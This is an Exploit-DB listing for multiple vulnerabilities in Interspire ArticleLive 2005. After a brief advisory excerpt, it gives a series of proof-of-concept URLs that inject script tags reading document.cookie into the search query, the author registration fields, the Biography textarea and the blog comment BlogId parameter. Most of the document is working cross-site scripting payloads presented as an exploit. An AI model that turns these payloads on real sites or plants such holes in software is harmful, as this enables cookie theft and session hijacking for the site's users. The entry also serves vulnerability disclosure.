interspire articlelive 2005 - Multiple Vulnerabilities

2005-05-04T00:00:00
ID EDB-ID:25599
Type exploitdb
Reporter Dcrab
Modified 2005-05-04T00:00:00

Description

Interspire ArticleLive 2005 Multiple Remote Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/13493/info

Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks.

Interspire ArticleLive 2005 is reportedly affected by these issues. 

http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categor
ies=0

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</sc
ript>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab

http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>